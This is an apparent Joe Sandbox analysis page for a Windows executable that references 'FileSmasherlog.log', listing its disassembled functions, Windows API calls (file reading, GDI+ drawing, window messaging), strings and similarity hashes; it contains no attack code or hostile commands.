PathCombineW.SHLWAPI(?,?,FileSmasherlog.log), ref: 0044B3E7

Strings

FileSmasherlog.log, xrefs: 0044B3DA

Memory Dump Source

Source File: 00000000.00000002.3339266864.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3339255202.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339318599.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339338378.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339349997.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339362931.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339384348.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339398392.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339413386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: CombinePath_memcpy_s_memset
String ID: FileSmasherlog.log
API String ID: 232186430-2087025332
Opcode ID: f38719b63e4a58efeae16a1055e39b569ee186577a0a0224e83fc7e14aff827c
Instruction ID: b8d786c3539c2a298d6f883af7bfcf80420857e64b4566834a03dfc224f4846f
Opcode Fuzzy Hash: f38719b63e4a58efeae16a1055e39b569ee186577a0a0224e83fc7e14aff827c
Instruction Fuzzy Hash: 4341D1719006089BDB20DF15CD89B9BB3F8EF44704F444AAFD80A97641EB78AA44CFD9

Function 004450AE Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 70stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(lLD,?,?,?,?,00444C6C), ref: 004450C1
_memcpy_s.LIBCMT ref: 00445118
_memcpy_s.LIBCMT ref: 00445124

Part of subcall function 00444FC0: __recalloc.LIBCMT ref: 00444FCD

Strings

lLD, xrefs: 004450B3, 0044511D, 004450BD, 00445121

Memory Dump Source

Source File: 00000000.00000002.3339266864.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3339255202.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339318599.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339338378.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339349997.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339362931.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339384348.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339398392.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339413386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: _memcpy_s$__recalloclstrlen
String ID: lLD
API String ID: 1643393976-2482073302
Opcode ID: 2bc07231f0a52fb1e1d986ee3d4890ecd37f8cc4c373b6470dbd4b8f209a306c
Instruction ID: 0af3052e2c3cda55dded2cc7d3fc3adf4c090ac3c8e807509ff878425f858bbd
Opcode Fuzzy Hash: 2bc07231f0a52fb1e1d986ee3d4890ecd37f8cc4c373b6470dbd4b8f209a306c
Instruction Fuzzy Hash: D0218471A002099BDF14DFA5D882ABFB7B8EF48314F14411FEA05A7201DA7D9901CBA5

Function 0048754A Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 43libraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 004817D5: EnterCriticalSection.KERNEL32(004E1018,?,?,?,?,00481362,00000010,00000008,00482185,00482128,004811E3,0048109F), ref: 0048180F
Part of subcall function 004817D5: InitializeCriticalSection.KERNEL32(?,?,?,?,?,00481362,00000010,00000008,00482185,00482128,004811E3,0048109F), ref: 00481821
Part of subcall function 004817D5: LeaveCriticalSection.KERNEL32(004E1018,?,?,?,?,00481362,00000010,00000008,00482185,00482128,004811E3,0048109F), ref: 0048182E
Part of subcall function 004817D5: EnterCriticalSection.KERNEL32(?,?,?,?,?,00481362,00000010,00000008,00482185,00482128,004811E3,0048109F), ref: 0048183E

Part of subcall function 00481347: __EH_prolog3_catch.LIBCMT ref: 0048134E

Part of subcall function 004811C7: __CxxThrowException@8.LIBCMT ref: 004811DD
Part of subcall function 004811C7: __EH_prolog3.LIBCMT ref: 004811EA

GetProcAddress.KERNEL32(00000000,HtmlHelpW), ref: 00487593
FreeLibrary.KERNEL32(?), ref: 004875A3

Strings

HtmlHelpW, xrefs: 0048758D
hhctrl.ocx, xrefs: 00487577

Memory Dump Source

Source File: 00000000.00000002.3339266864.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3339255202.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339318599.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339338378.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339349997.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339362931.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339384348.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339398392.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339413386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: CriticalSection$Enter$AddressException@8FreeH_prolog3H_prolog3_catchInitializeLeaveLibraryProcThrow
String ID: HtmlHelpW$hhctrl.ocx
API String ID: 2853499158-3773518134
Opcode ID: eec98b7650f7f5d229f56635a8b6c4b8c350708b90254ed33227c3c876a07661
Instruction ID: c0c457cd16ccdcaeea54e86c4fd87a7160d9f4cf01da0e411e33ac307b778ec4
Opcode Fuzzy Hash: eec98b7650f7f5d229f56635a8b6c4b8c350708b90254ed33227c3c876a07661
Instruction Fuzzy Hash: E401DF31104706BBCB213FA2C809B5F7AD89B04750F208C2BF556919A1DB78C850975D

Function 0049E5F9 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 38libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(KERNEL32,00490CB1), ref: 0049E5FE
GetProcAddress.KERNEL32(00000000,IsProcessorFeaturePresent), ref: 0049E60E

Strings

KERNEL32, xrefs: 0049E5F9
IsProcessorFeaturePresent, xrefs: 0049E608

Memory Dump Source

Source File: 00000000.00000002.3339266864.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3339255202.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339318599.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339338378.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339349997.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339362931.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339384348.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339398392.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339413386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: IsProcessorFeaturePresent$KERNEL32
API String ID: 1646373207-3105848591
Opcode ID: 2d09e1f58d27da13e7b422deae5c6b991f59852bedd076ebe9db334e3e7a04e0
Instruction ID: 5d59013588b00adf7d0845515ba78f042050767efe60ab05ea6d9b7fb8e80628
Opcode Fuzzy Hash: 2d09e1f58d27da13e7b422deae5c6b991f59852bedd076ebe9db334e3e7a04e0
Instruction Fuzzy Hash: 0AF01D20A00A09E2DF106BA2BC0A7AF7E79FB80746F9205A1E1A5A0185DF758475D69A

Function 004870A2 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 35COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 004870A9

Strings

)N, xrefs: 004870D3
@*N, xrefs: 004870DB
8)N, xrefs: 004870C3

Memory Dump Source

Source File: 00000000.00000002.3339266864.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3339255202.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339318599.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339338378.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339349997.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339362931.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339384348.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339398392.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339413386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: H_prolog3
String ID: 8)N$@*N$)N
API String ID: 431132790-3691162762
Opcode ID: 4bceb7bd07d25ed5b7a99a45c863f77be5e3e0ebf6ce10d57c5ffc0a8ca1813a
Instruction ID: dd1837e293c9f515b74e6a1dbc94df00e39c8eafd580620671983e36f85f8fec
Opcode Fuzzy Hash: 4bceb7bd07d25ed5b7a99a45c863f77be5e3e0ebf6ce10d57c5ffc0a8ca1813a
Instruction Fuzzy Hash: DDF0AD71E043618BCB34BB1A819876E72A06B01719F219A2FE595477E2C7BCCC44D74D

Function 0043C1D0 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 23memoryCOMMON

Download Yara Rule

APIs

SysAllocString.OLEAUT32(yes), ref: 0043C1DA
VarBstrCmp.OLEAUT32(?,00000000,00000400,00000000), ref: 0043C1F0
SysFreeString.OLEAUT32(00000000), ref: 0043C1FC

Strings

yes, xrefs: 0043C1D5

Memory Dump Source

Source File: 00000000.00000002.3339266864.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3339255202.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339318599.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339338378.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339349997.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339362931.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339384348.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339398392.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339413386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: String$AllocBstrFree
String ID: yes
API String ID: 359749342-1978086825
Opcode ID: 5a693b34c5fa423649dc46686fdeadc613667017fc3560e40a658dcea4bf2b5a
Instruction ID: e600b2d09dd7dddf48b1386afc47337d7b0e41dd9a9f86ff21ded1716e6caa0a
Opcode Fuzzy Hash: 5a693b34c5fa423649dc46686fdeadc613667017fc3560e40a658dcea4bf2b5a
Instruction Fuzzy Hash: 1FE0C2321812247FD1105B6A9C99FD73B9CDF46AA0F004116F60487180C9769800C6B8

Function 00476670 Relevance: 6.2, APIs: 4, Instructions: 191fileCOMMON

Download Yara Rule

APIs

GetFileSizeEx.KERNEL32(?,?,?,?,00000000,?,?,?,?,?,0047728A,?,00000000,?), ref: 0047668C
SetFilePointerEx.KERNEL32(?,?,?,00000000,00000000,?,?,?,?,?,0047728A,?,00000000,?), ref: 0047672B
ReadFile.KERNEL32(?,?,00008000,?,00000000,?,?,?,?,?,0047728A,?,00000000,?), ref: 00476747
_memset.LIBCMT ref: 004767EE

Memory Dump Source

Source File: 00000000.00000002.3339266864.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3339255202.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339318599.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339338378.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339349997.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339362931.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339384348.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339398392.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339413386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: File$PointerReadSize_memset
String ID:
API String ID: 1834740430-0
Opcode ID: 0baaf64e86dd44744958b53e668970a06d0855052843d957aa2a11ef40b6bb02
Instruction ID: 6151f60ee9c84707b86d9a20b60ccc22e606c985d082c452e23b09b8a49b0afc
Opcode Fuzzy Hash: 0baaf64e86dd44744958b53e668970a06d0855052843d957aa2a11ef40b6bb02
Instruction Fuzzy Hash: A551AE716047009FD314DE29D880BABB7E5FB88354F55892EF88DD7340EB38E9458B9A

Function 00423440 Relevance: 6.2, APIs: 4, Instructions: 164COMMON

Download Yara Rule

APIs

CopyRect.USER32(?,?), ref: 004234AA
GdipCreateFromHDC.GDIPLUS(?,?), ref: 004234BD
GdipSetSmoothingMode.GDIPLUS(?,00000004), ref: 004235FC

Part of subcall function 00423A40: GdipCreateLineBrushFromRectI.GDIPLUS(?,?,?,00000001,00000000,?,?,?,004235A3,?,?,?), ref: 00423A6A

Part of subcall function 004239F0: GdipFillRectangleI.GDIPLUS(?,?,?,?,?,?,?,?,0042373C,?,?,?), ref: 00423A0D

GdipDeleteBrush.GDIPLUS(?,?,?,?), ref: 004236BB

Memory Dump Source

Source File: 00000000.00000002.3339266864.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3339255202.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339318599.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339338378.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339349997.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339362931.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339384348.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339398392.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339413386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: Gdip$BrushCreateFromRect$CopyDeleteFillLineModeRectangleSmoothing
String ID:
API String ID: 1505107150-0
Opcode ID: ddadfbc7e1eb26cf1a3b3f6d79fd365c8315535ea20b84b420b07ddb1051f6fb
Instruction ID: 2cec408d75555abb1c4a90efc496f84bb4018504ca22bac25d91df4c02ebab6e
Opcode Fuzzy Hash: ddadfbc7e1eb26cf1a3b3f6d79fd365c8315535ea20b84b420b07ddb1051f6fb
Instruction Fuzzy Hash: 0F5116B16083029FC704EF55D88185FBBF9AFC8708F508A1EF58597311D678EA49CB9A

Function 0044A7C0 Relevance: 6.1, APIs: 4, Instructions: 128fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,C1DE166F), ref: 0044A81C
GetFileSize.KERNEL32(00000000,00000000), ref: 0044A82F
ReadFile.KERNEL32(00000000,00000000,?,?,00000000), ref: 0044A867
CloseHandle.KERNEL32(00000000), ref: 0044A8E8

Memory Dump Source

Source File: 00000000.00000002.3339266864.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3339255202.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339318599.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339338378.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339349997.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339362931.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339384348.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339398392.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339413386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: File$CloseCreateHandleReadSize
String ID:
API String ID: 3919263394-0
Opcode ID: d644d26533df63c07920f3f1add73790a58ed87c7a85fd8761546efb72eea84e
Instruction ID: cb96d1c1a344abd5dc9de915a8941917d73025fba777b5d6defc882ec8901fa7
Opcode Fuzzy Hash: d644d26533df63c07920f3f1add73790a58ed87c7a85fd8761546efb72eea84e
Instruction Fuzzy Hash: 6C41E3B1C00248ABEF10EBE4DC85AEEBBB8EF05314F14462EF51177281DB785A05C769

Function 00441340 Relevance: 6.1, APIs: 4, Instructions: 125COMMON

Download Yara Rule

APIs

GetClientRect.USER32(?,00000000), ref: 0044141E
GetClientRect.USER32(?,?), ref: 00441428
CreateAcceleratorTableW.USER32(?,00000001), ref: 00441449
GetParent.USER32(?), ref: 0044146E

Memory Dump Source

Source File: 00000000.00000002.3339266864.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3339255202.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339318599.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339338378.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339349997.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339362931.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339384348.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339398392.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339413386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: ClientRect$AcceleratorCreateParentTable
String ID:
API String ID: 2716292469-0
Opcode ID: 95d7ee9c6f019d0449d151d6d7d4fd9dff72f482086141806373a2c613926aab
Instruction ID: 9068c6d1e89fec5dfde549417842440e462e6edac44b9190cf5b4ae782eca584
Opcode Fuzzy Hash: 95d7ee9c6f019d0449d151d6d7d4fd9dff72f482086141806373a2c613926aab
Instruction Fuzzy Hash: 9F4127B56002059FEB14CF64C880BABB7E9FF88314F10895DE9099B350D778E990CBA4

Function 0046E410 Relevance: 6.1, APIs: 4, Instructions: 113windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000113E,00000000,0000F000), ref: 0046E449
SendMessageW.USER32(?,0000110A,00000003,00000201), ref: 0046E4B7
SendMessageW.USER32(?,0000110A,00000003,?), ref: 0046E4CE
SendMessageW.USER32(?,0000113F,00000000,00000018), ref: 0046E529

Memory Dump Source

Source File: 00000000.00000002.3339266864.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3339255202.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339318599.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339338378.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339349997.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339362931.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339384348.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339398392.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339413386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 3b6afa3a41117d98efad31a765cd4e3ee3e6e1137afb1f88c374c91f222d183b
Instruction ID: 0a50794e182766536891548859ddcfcf6837cfdc01b685d1ec99ee1c727b3b10
Opcode Fuzzy Hash: 3b6afa3a41117d98efad31a765cd4e3ee3e6e1137afb1f88c374c91f222d183b
Instruction Fuzzy Hash: DA414C74A00219AFDB14DFAAD881EAEB7F8FF08314F10815AE915A7345EB34ED41CB95

Function 00424020 Relevance: 6.1, APIs: 4, Instructions: 104windowCOMMON

Download Yara Rule

APIs

GdipGetImageWidth.GDIPLUS(?,?), ref: 0042403C
GdipGetImageHeight.GDIPLUS(?,?,?,?), ref: 00424053
GdipBitmapGetPixel.GDIPLUS(?,?,00000000,?,?,?,?,?,?), ref: 0042408F
GdipBitmapSetPixel.GDIPLUS(?,?,00000000,?,?,?,00000000,?,?,?,?,?,?), ref: 00424113

Memory Dump Source

Source File: 00000000.00000002.3339266864.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3339255202.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339318599.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339338378.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339349997.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339362931.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339384348.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339398392.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339413386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: Gdip$BitmapImagePixel$HeightWidth
String ID:
API String ID: 2829946855-0
Opcode ID: 2bafe50b4cd16e6c0fce3f4730de0bcb0bdcb025c6a603726646db373566b17d
Instruction ID: d2cc8af1bf16ca7be1f00f3773d7ad9c581c7ccd4ca93e8ee6db63fee2bc6e33
Opcode Fuzzy Hash: 2bafe50b4cd16e6c0fce3f4730de0bcb0bdcb025c6a603726646db373566b17d
Instruction Fuzzy Hash: 2C3192B0E00229AFDB10DF95D9854BEFBF8FF84705B50855AE915A3200D3386A91CBE4

Function 00424140 Relevance: 6.1, APIs: 4, Instructions: 104windowCOMMON

Download Yara Rule

APIs

GdipGetImageWidth.GDIPLUS(?,?), ref: 0042415C
GdipGetImageHeight.GDIPLUS(?,?,?,?), ref: 00424173
GdipBitmapGetPixel.GDIPLUS(?,?,00000000,?,?,?,?,?,?), ref: 004241AF
GdipBitmapSetPixel.GDIPLUS(?,?,00000000,?,?,?,00000000,?,?,?,?,?,?), ref: 00424226

Memory Dump Source

Source File: 00000000.00000002.3339266864.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3339255202.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339318599.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339338378.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339349997.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339362931.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339384348.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339398392.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339413386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: Gdip$BitmapImagePixel$HeightWidth
String ID:
API String ID: 2829946855-0
Opcode ID: af0e90832f511d133f729884774fc1196cdbb22133e22969916b00618cc79a5f
Instruction ID: 0ee44c7dda0063b873c49ff7400baac87b7ce386fedb679ffbc5797c76a402e2
Opcode Fuzzy Hash: af0e90832f511d133f729884774fc1196cdbb22133e22969916b00618cc79a5f
Instruction Fuzzy Hash: D131E770A00236EFDB14DE96ECC44BEF7B4EB94304B50866BE425D7641C23CA991DBE9

Function 00424260 Relevance: 6.1, APIs: 4, Instructions: 104windowCOMMON

Download Yara Rule

APIs

GdipGetImageWidth.GDIPLUS(?,?), ref: 0042427C
GdipGetImageHeight.GDIPLUS(?,?,?,?), ref: 00424293
GdipBitmapGetPixel.GDIPLUS(?,?,00000000,?,?,?,?,?,?), ref: 004242CF
GdipBitmapSetPixel.GDIPLUS(?,?,00000000,?,?,?,00000000,?,?,?,?,?,?), ref: 00424344

Memory Dump Source

Source File: 00000000.00000002.3339266864.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3339255202.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339318599.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339338378.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339349997.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339362931.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339384348.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339398392.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339413386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: Gdip$BitmapImagePixel$HeightWidth
String ID:
API String ID: 2829946855-0
Opcode ID: d76ab6ec8e24807569e73e388baa743526c80a1cb931ad595a7ba3babf8b5fd4
Instruction ID: 4e1e74171ca53cadc9a258f722f4827c3c999a49b092120ff199828192a2837b
Opcode Fuzzy Hash: d76ab6ec8e24807569e73e388baa743526c80a1cb931ad595a7ba3babf8b5fd4
Instruction Fuzzy Hash: 6931B871E00536AF9B04DFE6D8C04BFFBB4EE85341B10865EE815A3640D2385945CBF4

Function 0043F2B0 Relevance: 6.1, APIs: 4, Instructions: 83windowCOMMON

Download Yara Rule

APIs

GetFocus.USER32 ref: 0043F359
IsChild.USER32(?,00000000), ref: 0043F364
GetWindow.USER32(?,00000005), ref: 0043F374
SetFocus.USER32(00000000,?,?,?,004AD718,000000FF,?,0043F298,?), ref: 0043F37B

Memory Dump Source

Source File: 00000000.00000002.3339266864.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3339255202.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339318599.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339338378.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339349997.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339362931.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339384348.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
